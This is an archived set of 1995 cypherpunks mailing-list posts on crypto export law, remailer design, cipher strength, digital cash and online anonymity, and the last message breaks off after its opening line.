From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 27 Oct 1995 03:50:26 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: CJR returned to sender
In-Reply-To: <199510261423.HAA10098@jobe.shell.portal.com>
Message-ID: <199510261429.KAA11299@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> But lines are always arbitrary.
[...]
> This whole exercise in line-drawing doesn't seem
> that productive to me.

The purpose of this exercise is to find out where the arbitrary line
is, and to note that it is a silly and idiotic place to put the line,
in the hopes of eliminating the line and the law with it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 27 Oct 1995 15:49:34 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb4d64d11021004827b@[137.110.24.250]>
Message-ID: <199510261443.KAA25683@homeport.org>
MIME-Version: 1.0
Content-Type: text


Lance Cottrell wrote:

| How open is the protocol? Is there and API for it? Does anyone know how big
| the coins are? There will have to be room for one per header in Mixmaster.
| Do they vary in size, or are all coins identical? There is so much stuff to
| try to keep track of all at once! :/

	If the coin is bigger than a Mix header has room for, does it
have room for an arbitrary token?

	I send a message to the mixmaster I'd like to use, containing
a coin and a large arbitrary number.  I then put that number in a list
I maintain of the tokens I can spend with that mixmaster.

	The mixmaster cashes the coin at once[1], and puts my number
into a list of 'paid' tokens it will accept.

	When I want to spend the token, I put that in the message
header block.   Since its smaller than the coin, its easier to put in
the header than the coin.

	This scheme also reduces mapability between the coin and the
message, since they are not strongly correlated in time as they would
be if they were included in the message.  This seems to be a stronger
win than the size benefit that caused me to suggest this.

	[1] Other than the time mapping win, I could also see spending
a few bucks at the start of each month to be able to use any
mixmaster.  The mixmasters would, by cashing my coins early, win on
the float between the time they get my money and the time they provide
service.  Icing on the cake.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 27 Oct 1995 11:34:04 +0800
To: shgoh@ncb.gov.sg (Goh Seow Hiong)
Subject: Re: symmetric key algorithms
In-Reply-To: <Pine.3.89.9510261019.A29735-0100000@gallery.ncb.gov.sg>
Message-ID: <199510261450.KAA25716@homeport.org>
MIME-Version: 1.0
Content-Type: text



| Could anyone comment on the acceptability and reliability of the 
| SAFER algorithm, in comparison with other algorithms such as IDEA,
| Triple-DES, DES, RC4, ....  Has there been any comparison paper 
| written on the pros and cons of the different symmetric key algorithms?

	There was a weakness shown in SAFER K-64 by Lars Knudsen at
Crypto '95.  It involved a related key chosen plaintext attack, which
derived from SAFER's XOR'ing the data with the key too often.

	It would make me nervous about using SAFER, but I'm just an
amateur at the crypto stuff.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 27 Oct 1995 10:48:39 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: rejection of CJR
Message-ID: <m0t8Tqi-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


I happened to speak to Mr. Capilino at the Office of Defense Trade
Controls this morning, and mentioned that the Commodity Jurisdiction
Request for the T-Shirt had been returned and read him the message to
that effect.

He told me that that was the wrong address for mail, since it was used
only for currier deliveries, and that they have stopped accepting even
currier deliveries there since the Oklahoma city bombing.

He suggested that those who want to apply for the Commodity
Jurisdiction determination should call him at 703-875-7396.  He will fax 
the current information on how to submit a CJR to anyone upon request.  
He did not say so, but I rather think he looks forward to getting the
T-Shirt request.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 27 Oct 1995 06:30:35 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Perrynoia in the Comics
Message-ID: <199510261804.LAA03266@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 AM 10/26/95 -0400, you wrote:
>
>Alan Olsen writes:
>> This has no real crypto relevence, but some anarchistic relevence.
>
>Alan;
>
>As much as I found the comment interesting, it probably belonged
>somewhere like libernet-d, not here on cypherpunks.

I posted it on Cypherpunks becuase it is the only list I take where such
political views are even mentioned.  I thought that people on the list would
enjoy it.  I prefaced it with [noise[] so that people who would object would
skip over it.  Evidently that disclaimer is not enough anymore.

>[I'm posting this in public, as I do about one in ten such messages,
>so that a wider audience of people will be discouraged from posting
>such things in advance. Don't bother mailing me a message saying "you
>are adding to the noise yourself, why not mail in private" -- I do
>that 90% of the time. Sometimes the nose levels rise enough that I
>feel that a few public mentions would do some good.]

I am not certain as to the "nose levels" as I thought they stopped
publishing a number of months back.

I think you need to get some treatment for those hardening of the orthodixies.

|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 27 Oct 1995 09:09:34 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb57c2b010210043b15@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think the idea of a token has come up before. I think it is a good idea.
The token should have some expiration information in it so the remailer
need not keep it around forever (or it could just "forget" all token older
than 3 months). Right now there is not much spare room in the Mixmaster
headers.

There are several ideas for improvements in Mixmaster that will require the
adoption of an incompatible message format. I plan to collect them and
implement them all at once. One of the ideas is an expiration date in the
message to keep it from ever being replayed (even after the remailer
expires its record of the message ID).

        -Lance

At 7:43 AM 10/26/95, Adam Shostack wrote:
>Lance Cottrell wrote:
>
>| How open is the protocol? Is there and API for it? Does anyone know how big
>| the coins are? There will have to be room for one per header in Mixmaster.
>| Do they vary in size, or are all coins identical? There is so much stuff to
>| try to keep track of all at once! :/
>
>        If the coin is bigger than a Mix header has room for, does it
>have room for an arbitrary token?
>
>        I send a message to the mixmaster I'd like to use, containing
>a coin and a large arbitrary number.  I then put that number in a list
>I maintain of the tokens I can spend with that mixmaster.
>
>        The mixmaster cashes the coin at once[1], and puts my number
>into a list of 'paid' tokens it will accept.
>
>        When I want to spend the token, I put that in the message
>header block.   Since its smaller than the coin, its easier to put in
>the header than the coin.
>
>        This scheme also reduces mapability between the coin and the
>message, since they are not strongly correlated in time as they would
>be if they were included in the message.  This seems to be a stronger
>win than the size benefit that caused me to suggest this.
>
>        [1] Other than the time mapping win, I could also see spending
>a few bucks at the start of each month to be able to use any
>mixmaster.  The mixmasters would, by cashing my coins early, win on
>the float between the time they get my money and the time they provide
>service.  Icing on the cake.
>
>Adam
>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMI/NvfPzr81BVjMVAQGcbgf/b9wzPqGoijggurIm3uGiddSyaz2uAEXj
65INp6g/Va/Yf1q3+vQfyfixs3jviihmPMgepjs/deQqV5qxgEh05kbyvgKDf8wX
vh8cVLTYMKpqGOU34K/9jLOXD9gZqvKBdDy9Z5YsLimDRV3ju9uRpBSLnUaiI1rU
whpP+py/hqgFl0DL4Ybx5PBZDbcSkRhSqmlnx46/hbyY/bnaiTplPtMAU8oHZTK6
VOSB3hsPtfpGuKwCqe60WeZZDQygPbD6aDW+BZl4kMSv5+1kf4/aHECCOUqfzmvc
O1Jmr6K8wLLtp/S12qRKh4SIEea9TUqN4PoV6YGQTBV1gM6MxC/GrQ==
=qSuu
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 27 Oct 1995 11:04:32 +0800
To: drehm@wamu.brandywine.american.edu
Subject: Diane Rehm Show just ended
Message-ID: <9510261522.AA07260@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


You just finished a show on terrorism (WAMU, 10-11am, 10/26/95).  Thank you.

Some of your callers said most of what I would have said and I found that
pleasing, since I wasn't able to call in.

However, there was a theme which kept coming up and which wasn't addressed
specifically.  You might hold it in mind for future shows on terrorism:

	The FBI representative was saying that the goal is to *prevent*
	terrorism, not just to investigate and prosecute crimes after the
	fact.  I heard Director Freeh (on 10/19 on All Things Considered)
	say something similar -- that the FBI's job was to protect the
	people (which can be be translated into "prevent terrorism").



This seems to be a major problem and perhaps the source of the concern
about civil liberties.

Terrorism might be a product of an organized, identified group and
infiltration of that group might enable the FBI to prevent acts of
violence.  Of course, the permission to infiltrate suspicious groups has
been used in the past to justify infiltration of non-violent but unpopular
groups like the Sanctuary Movement.

However, many of our recent terrorist acts appear to be the result of
individual actions -- not those of organized groups.  [Unabomber, OK City,
train derailment] Infiltration is out of the question in such cases.  The
only way to prevent such acts is to put the entire population of the US
under surveillance -- an authentic instance of Big Brother from 1984.

The conclusion to me is that we can not task the FBI with the job of
prevention of terrorism.  I suspect that we must insure that the FBI is
formally and carefully restricted to the job of investigating and
prosecuting crimes once they occur -- allowing the threat of almost certain
prosecution to serve as a prevention -- rather than with the impossible job
of prevention of such crimes.

		------------------------------

Meanwhile, there was one question I had that no one answered:

I didn't like history much as a student, but I vaguely remember other
periods of domestic terrorism: bombings in the early 1900s, acts of
violence associated with the labor movement, sabotage during WW-I conducted
by German agents.  There may have been many others.  This seems to be a
feature of life -- nothing recent, nothing special, frightening from its
news coverage but not a serious threat to any one individual (because of
the actual statistics around the threat -- comparing my chance of injury
due to auto accident, plane flight or terrorist act (for example)).  It
would be interesting to know why we had the pause in terrorism during the
Cold War -- or, for that matter, if we actually did.  Could it be that the
apparent return of terrorism is actually a perception rather than a fact --
as a result of shift in focus of the news media?

 - Carl



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 27 Oct 1995 10:01:09 +0800
To: cypherpunks@toad.com
Subject: I resubmitted the CJR
Message-ID: <199510261833.LAA24364@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I have been told by several people that I did it wrong. Apparently
there are two addresses: one for mail, and one for couriers. The first
time, I sent it by mail to the courier address. This time, I also sent
a fax. From what I've heard, I should be receiving a tracking number
within a few days.

   Also, for those who were wondering, the "Arlington, CA" address was
merely a keying error. The actual envelope said VA.

   I will keep the list up to date with any further developments.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 27 Oct 1995 06:14:02 +0800
To: jeffb@sware.com
Subject: Re: 80 bit security from 40 bit exportable products
In-Reply-To: <199510252222.PAA16375@comsec.com>
Message-ID: <9510261534.AA08170@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



>Even if you assume complete independence of key setup, if a successful
>decryption at each layer can be independently detected and verified
>(which seems likely in your example), there're only about 3 * (2 ^ 40)
>total operations in the worst case, NOT 2 ^ (3 * 40) operations needed
>to expose the plaintext.  This is an effective 41.5 bits, not 120.
>

Of course.  It comes down to whether each encryption step plans some known
plaintext to be used for brute force testing of any next layer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 27 Oct 1995 11:11:13 +0800
To: cypherpunks@toad.com
Subject: MD5 and ITAR questions
Message-ID: <Pine.SOL.3.91.951026115444.19935B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



I can't remember the exact details, so could someone give me a quick 
refresher- which of the following are considered ok under ITAR?

	MD5 as a checksum
	keyed MD5 for authentication
	keyed MD5 as a stream cypher

Thanks
Simon


 ---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 27 Oct 1995 06:31:59 +0800
To: cypherpunks@toad.com
Subject: Re: MD4-derived hash functions
In-Reply-To: <01HWW4G5KUE69LV2GV@delphi.com>
Message-ID: <9510261603.AA26221@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Does anyone know whether Rivest was motivated to design
>MD5 by the partial attacks on MD4, or whether those came later?
>(This is totally idle curiousity.)

It was after...

>All of the well-known software hash functions seem to be based on
>MD4 these days, but that doesn't mean much about the security of
>MD4--3DES with three independent keys looks pretty strong, as does.
>3DES with two independent keys, but that doesn't mean that single
>DES is a strong enough cipher for modern applications.

3DES with only two independent keys is only slightly more secure than
DES, consider a variant of the meet in the middle attack exploiting 
the fact that the constraint network is reductible to two equations
in one unknown.

>Is there a generic construction for
>arbitrary-length hash functions from good block or stream ciphers?

Yes, see Bruce's book.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller <hroller@metronet.com>
Date: Fri, 27 Oct 1995 05:41:13 +0800
To: remailer-operators@c2.org
Subject: Re:NEVER MIND - Anonymous Account Help
In-Reply-To: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
Message-ID: <Pine.HPP.3.90.951026120745.9325A@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, hroller wrote:

> Then I wait. But never get anything from alpha.c2.org.  I have gotten 
> some anonymous messages from replay, but they are still encrypted so 
> I don't know what it is sending me. Any help you can supply would be
> greatly appreciated.
> 
> 
> hroller
> 

Thanks to sameer, David and Joel M. for pidaho, it was working all the 
time. Those messages I was getting were the confimations. I just didn't 
know it. After decrypting the messages everything is working fine now. 
The only thing I didn't see in the Help files was that when you get 
confirmation from Alpha, it will be encrypted. But that was pointed out 
in Pidaho, Ver 2.5 Beta 6. 

Again thanks to all that helped. 

hroller




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ali@eit.COM (Ali Bahreman)
Date: Fri, 27 Oct 1995 08:59:47 +0800
To: cypherpunks@toad.com
Subject: RE: Let's Not Merge Mailing Lists, OK?
Message-ID: <199510262011.NAA22257@penetralium.eit.com.>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

The problem is reducing the noise at cypherpunks list, so all communities can 
benefit from it, and not the "varying levels of competence" different 
communities may have.  What more noble cause is there than to educate others of 
your beliefs.  A well thought out question or cross-point is not noise but a 
poorly-backed false claim certainly is.

In special instances, cross-postings enable the cypherpunk community and 
the other communities to interact together to produce real-life solutions that 
real people would care to use.  Thinking on the social issues such as anonymity
and privacy with no regards to what other communities think about or have to 
say is simply not optimum.

Now if there is technical issues, such as mail-loops or some such thing against
cross-postings, please inform.

Regards,

Ali

p.s.
Being subscribed to cypherpunks is not a prerequisite for following the list;
thanks to its hypermail archive and numerous filters.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Fri, 27 Oct 1995 11:07:40 +0800
To: cypherpunks@toad.com
Subject: Usenet: pseudonymity's killer app
Message-ID: <199510262021.NAA03361@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

     Risks Digest 17.42 contains a Boston Globe story by Simson
L. Garfinkel detailing the risks of the DejaNews (http://dejanew.com)
Usenet archiving service.  Not only does this service archive Usenet
postings, it provides a "sophisticated system for retrieving 'author
profiles' of the individuals who have posted messages."  Many people
are upset at what they view as an invasion of privacy.

     The article notes that:

 > But Usenet has actually been archived for a long time. Many schools,
 > for example, have backup tapes containing Usenet messages dating back
 > many years. Furthermore, says Madere, the National Security Agency and
 > possibly other law enforcement or intelligence organizations has been
 > cross-referencing and indexing Usenet for quite some time. "I know for
 > a fact that they do have a text retrieval database which contains
 > Usenet," says Madere.  Creating a searchable index of Usenet " was
 > already done for what people might consider to be sinister purposes,"
 > says Madere. "What we have done is made it searchable for useful
 > purposes."

     DejaNews will be archiving the alt, talk, and soc groups
beginning later this year.  That could result in many more people
becoming upset at the service.

     It would appear that ISPs could make money from offering
anonymous or pseudonymous accounts to their customers who would rather
not have their postings used by marketers, employers, or neighbors.
Providing protection from junk mailers is also more politically
defensible in this society than providing protection from the
government.

     This could be the catalyst for widely used and accepted
pseudonymity on the net.

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI/tze5Yg08fDKehAQHUiwP/ePOJeQ5+R0+h0QQVJEziWFZvz0qCMooA
6jQXjDxWpxydas+KYCe9dt2yekjsh3Lr/bc+VHDtuTuE4l+m3HIFqk7uWxYk7iB6
fjIhuPMcmVSIg+lPOTFIlhfypmwE/6c4FHXiGb6N02Pc5E22BJFjECOdx1RNlJwv
A8DbV/lAyGI=
=FjnE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottg@b4a206.mdc.com (TECO Master)
Date: Fri, 27 Oct 1995 18:04:39 +0800
To: CYPHERPUNKS@toad.com
Subject: Testing... Is this thing turned on?
Message-ID: <95102613292182@b4a206.mdc.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for mulching bandwidth, but I haven't received anything for
about a week...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 27 Oct 1995 09:46:13 +0800
To: cypherpunks@toad.com
Subject: newsweek oct 30 Levy digital cash article
Message-ID: <199510262050.NAA00978@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



a slick article by Steven Levy appears in the oct 30 Newsweek
mag (cover Farrakhan).

I'll let the ILF post it, but here are a few of the 
elements:

- covers mark twain bank going live with Chaumian "e-money"

- also a sidebar on Mondex..

- 1st virtual mentioned

- Bruce Sterlings "heavy weather" e-money dystopia

- Netscape flaw as example of the stakes

- US government get into the act?

- privacy concerns (EPIC Rotenberg quoted)

- "tax may be voluntary" --Barlow

- FinCEN worried about drug money

I didn't find any obvious errors or overhyped paranoia, so I commend
Levy on the article. it can be seen as a definite cypherpunk cap-feather.
Levy is doing a really great job IMHO. an editorial in an earlier issue
of newsweek about Rimm and pornography in cyberspace was dead bang on..

p.s. I'm very curious about the "information security" reference that
someone gave earlier, has there been any more information here about
that one?

--

also, my question about whether one loses the downloaded Chaumian bucks
if one's hard drive crashes was answered in the affirmative by Levy.
hoo boy, I think this could become one of the worst new urban legends
about losing money due to failed hardware/software. there is going to
be a lot of paranoia about this item. I'll bet virtually all digital
buck schemes will have to explicitly answer this question to a 
paranoid public: what happens if my computer crashes?

part of my motivation for querying about losing cash due to a hardware
failure was based on an interest in showing how the really "soft"
system of credit card purchasing that we have now, while considered 
lame by a lot of cypherpunks, often protects the consumer. remember,
Jane Sixpack is frequently locking her keys in a car. ecash that
can be lost or stolen just like real cash may not be as attractive
as say a credit card system whereby one can sometimes call up the
company and say afterwards, "I didn't really mean that".

cypherpunks should consider that one of the key things we think is
the strength of ecash--namely privacy-- may be a key area the
opposition to untracable cash transactions can tout as a weakness or
problem.

it seems to me that the very techniques that tends to enhance privacy also
tend to make the spending "more dangerous" in the sense that one
cannot backpedal or one can lose it, irretrievably, more easily.
for a public with the IQ of Joe and Jane Sixpack, this could be a 
serious concern. identification is key to helping people retrieve
lost or stolen checks, etc.

"have you ever locked your keys in your car? don't use digital ecash.
you might lose it and never get it back."

I suggest that Chaum definitely consider this a major aspect in his
marketing campaign. it could be a very serious soft spot in widespread
public acceptance of ecash. rumors could float, "ecash is dangerous
to the consumer". hopefully we can head this one off at the pass.

imho, the future will never see complete digital cash, or complete
identification. they are likely to mix a lot. however I think ecash
may become very respectable, and ultimately become far more common
than identified transactions are today.

but its really amazing how no serious alarm flags have been going off
in the legislative arena about digital cash. I suspect this is going
to become a white-hot public policy issue. if you thought the fights
over terrorism, wiretapping, or pornography laws were messy, just
wait until legislators pinpoint digital cash as the horseman of
the infocalypse. fireworks will fly. may you survive interesting times. <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 27 Oct 1995 09:59:30 +0800
To: cypherpunks@toad.com
Subject: Digitial Money [SHAMELESS PLUG FOR BOOK]
Message-ID: <v02120d06acb5ab456a01@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Leslie Lundquist, a co-worker of mine here at Electric Communities,
together with Dan Lynch from Cybercash & Interop fame, has written
a book called  _Digital Money: The New Era of Internet Commerce_.

It should appear in stores "real soon now"; it can be ordered right now
from any book store for $24.95. The book is intended as an overview
of current and projected digital payment systems and commerce, and
contains basic background information on the underlying technology.
It is intended for the general reader: this is the kind of book a
techno-weenie might buy for his or her manager to help them understand
some of these issues.

Note that this is a different book than _Digital Cash_, by Peter Wayner.
I'm not in the loop on this, but this appears to be "one of those
things" and not intentional on anyone's part.

For more information, e-mail leslie@communities.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 27 Oct 1995 11:36:14 +0800
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510260221.MAA29674@molly.cs.monash.edu.au>
Message-ID: <199510261908.PAA22358@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum writes:
>How about the numerical cmavo? You'd want to encode numbers. And you
>don't want people to know they are numbers, because they could
>count the digits (to get order of magnitude). Same for spelling cmavo.

I agree.  There are some cmavo with enough meaning to warrant some encoding.

Ok, for numbers we take our original 40 bit (or whatever) key and, by
convention, run it through a md5 to produce the key used for the next
digit.  By writing all numbers with 20 digits (padding zeros on the
front or back as desired) magnitude (and/or precision) is hidden.

>How about the tense system? You'd want to encode that because it could
>give important hints to locations (and times). Then again you could
>probably avoid using the "a little to the north and a long way east" tense
>altogether...

I'm not sure it gives anything away.  The cryptanalyst would only know
that there's a location, not anything important about the location, since
it could be padded with "null" direction and temporal operators.

And the tense selma'o could probably be treated as a single group for
encoding.  They're only semantically different, not syntactically.  You'd
end up with more confusing cyphertext, but that's no real problem unless
you're trying to hide the fact that you're encoding --- for which you
could stego the cyphertext in a rant generator.

>How about the attitudinals?

There are enough that encoding them as a group hides their meaning.

>> The selma'o that only have one member are especially meaning-free, as
>> they're typically elidable terminators and such.
>
>Like I said, I only glanced at it, but how about NAI and GAI?
>
>...
>> >Yes, but the grammatical structure itself may reveal heaps.
>> >(Except for trivial statements.)
>> 
>> In a natural language this might be true, but in Lojban the grammar's
>> regularity eliminates much of this information.
>...
>
>I'm not sure I'd agree here. I suspect you are overestimating the regularity
>of lojban grammar (then again maybe I'm underestimating...).

I think you're underestimating because you're discarding the effect of
having a cypher which can arbitrarily substitute gismu and rafsi.  With
my original examples of "Attack at dawn" vs "Party 'til you puke", there's
nothing to relate the items.  A long sequence of similarly simple statements
wouldn't add anything.  Increasing the complexity of the statements makes
it more difficult to find a false key, but the regularity of Lojban should
give you enough leeway to do it.

You'd probably want to avoid really complicated bridi, but these sorts of
things tend to appear more in literary works than in ordinary communication.

>> There are also problems due to ambiguity.
>
>Yup. If it's really a problem - ambiguity in language has been with us
>for a long time and nobody minds much. But I guess you wouldn't want
>arbitrary ambiguity in your text (you could have an interactive coder
>which immediately alerts you to all alternative meanings). Or you could
>put marks into your text to separate the word parts (like some beginner
>Esperanto books do) thus eliminating the problem.

I had in mind the sort of ambiguity that comes from "Time flies like an
arrow", in which any of the first three words could be the verb.  A
computer translator would have to know which to conjugate and which to
decline.

>> The even bigger inconvenience with natural laguages comes in defining
>> the codebook.
>...
>
>I'm sure you could easily find wordlists giving the "first X" words of
>Esperanto - you could just standardize on one of them.

Yep, but it would have to be part of the cryptosystem's definition, as
opposed to the language's.

>Mi esperas ke tio cxi sencas...

.o'anai mi na cusku fi la .esperantos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Fri, 27 Oct 1995 11:15:06 +0800
To: cypherpunks@toad.com
Subject: [Dr. Fred] [FRED] (was: Re: Fred, Fred, Fred: Enough already!)
Message-ID: <199510261803.OAA18748@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:51 10.26.1995 +0800, James A. Donald wrote:
>At 11:58 AM 10/24/95 -0400, Robert Hettinga wrote:
>> Can we please talk to Dr. Fred, the Poster Child of the Informal Fallacy,
>> if we *really* have to, off line?
>
>Yes, please, will everyone please killfile Dr Fred.  I am tired of seeing
>things that are glaringly obvious explained in painful detail to someone
>who is reluctant to understand them.

At the very least, please put "Dr. Fred" or "[FRED]" in the subject line so
my filter hits it ("Fred" alone is too general).  Thanks. :-)

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Oct 1995 13:58:38 +0800
To: pjm@ionia.engr.sgi.com (Patrick May)
Subject: Re: Usenet: pseudonymity's killer app
In-Reply-To: <199510262021.NAA03361@ionia.engr.sgi.com>
Message-ID: <199510262218.PAA25204@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      It would appear that ISPs could make money from offering
> anonymous or pseudonymous accounts to their customers who would rather
> not have their postings used by marketers, employers, or neighbors.
> Providing protection from junk mailers is also more politically
> defensible in this society than providing protection from the
> government.

	Community ConneXion offers fully anonymous accounts.  If an
account holder chooses to reveal their personal details we will not
reveal them without a court order.  We've been doing it for over a
year now.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 27 Oct 1995 11:33:21 +0800
To: cypherpunks@toad.com
Subject: A real payoff of the export-SSL bruting.
Message-ID: <9510261935.AA23785@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


     I know of two companies which are developing products incorporating
cryptography. At both, the original plan was to distribute only a weak
exportable version. Marketing & distribution didn't want to deal the hassle
of stocking different versions, and worried that the export version would
be seen as inadequate.

    Since the bruting of export SSL by the cypherpunk's key-cracking
ring, this policy has changed. It is now clear that the exportable 
version can be cracked, and probably will be cracked, with all the bad 
PR that entails. Both companies now plan to release export and
domestic versions.  (Some overseas sales are better than none, and 
not everyone needs or uses the cryptographic capabilities).

     Speaking only for myself,

	Peter Trei
	ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 26 Oct 1995 16:34:02 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: Mandatory ID in California?
In-Reply-To: <Pine.SV4.3.91.951025152409.3136C-100000@larry.infi.net>
Message-ID: <199510260643.AA26567@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>"States may not authorize arrest...for failing to produce identification..."
>       Kolender v. Lawson 461 U.S. 352 (1983)
>
>"...may not compel an answer and they must allow the person to leave 
>after a reasonable brief period of time...."  - - ibid

How about INS coming into the equation?  Do they have additional powers which
let them put your butt in a bad imitation of a farday cage?

Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwm132@psu.edu (CATCH 22)
Date: Fri, 27 Oct 1995 15:02:53 +0800
To: cypherpunks@toad.com
Subject: type trapz...
Message-ID: <199510262143.RAA40206@r04n12.cac.psu.edu>
MIME-Version: 1.0
Content-Type: text/plain


looking for a good /type trap/ program...  any directions?



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CATCH 22 PHANZINE      $1 ppd please
4915 Woodbury Dr.
Erie PA  16510-6413
rwm132@email.psu.edu                ~~ issue four~~
________________________________________
\/؆ |˕RÕR||\| |\/|P|-|˕RܕK˕R





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 15:45:47 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb5766d09021004a512@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 PM 10/26/95, Jeff Weinstein wrote:

